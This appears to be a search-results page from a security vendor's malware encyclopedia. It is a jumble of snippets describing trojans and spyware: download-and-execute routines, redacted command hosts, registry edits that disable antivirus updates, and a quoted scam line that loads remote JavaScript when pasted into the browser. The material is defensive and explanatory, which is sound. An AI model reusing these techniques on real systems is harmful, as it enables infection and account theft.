Search
Keyword: URL
Extension} = %Application Data%\{Random File Name}.exe {Random Numbers} Other Details This Trojan displays the following message boxes: Security Tool Installed. It does the following: It connects to this URL
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
environment. NOTES: Download Routine This malware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals the
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
As of this writing, the said sites are inaccessible. NOTES: This Trojan sends the following system information to the URL {BLOCKED}8.net:6032 : CPU Speed Operating System used RAM System Language 12
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
thread performing its malicious routines. It also executes the legitimate file %System%\wdmaud.drv . This Trojan may connect to the URL liyanyanzy.{BLOCKED}2.org This Trojan does not have rootkit
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
XP, and Server 2003.) NOTES: As of this writing, the URL where the file can be downloaded is already inaccessible and it redirects to http://www.yahoo.co.jp . As a result, the downloaded file saved as
a virtual environment. NOTES: This spyware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals
the malware server Market - view a package specified by the malware server in the Android Market Web - view a URL specified by the malware server 12 for 2012: What Will The New Year Bring? Steals
(Default) = "%System%\MediaP.dll" NOTES: It connects to the following URL when Internet Explorer is opened: http://www.{BLOCKED}babys.com/cgi-bin/mmlogin.cgi Trojan.Win32.BHO.bnwy (Kaspersky), W32/BHO.BNWY
}5u.{BLOCKED}33.info//e.js?'+Math.random(),facebookdigits.body.appendChild(activation);void(0) 2. Delete the actual address from the url field in your browser and paste the code instead. 3. Press Enter
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
\Managechar.exe = %Application Data%\Managechar.exe NOTES: It connects to the following URL via HTTP GET to access other advertisement sites and possibly download other files into the system. However, during
following URL to continue the purchase: http://{BLOCKED}tion-privacy.com/buynow.php NOTES: It displays the following fake scanning window and bogus alerts on the affected system: It terminates all running
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
Manipulate system sound volume Open Web pages Read/Write/Delete registry values Record sounds using microphone Remove itself Send emails Start/Stop services Update itself It connects to the following URL to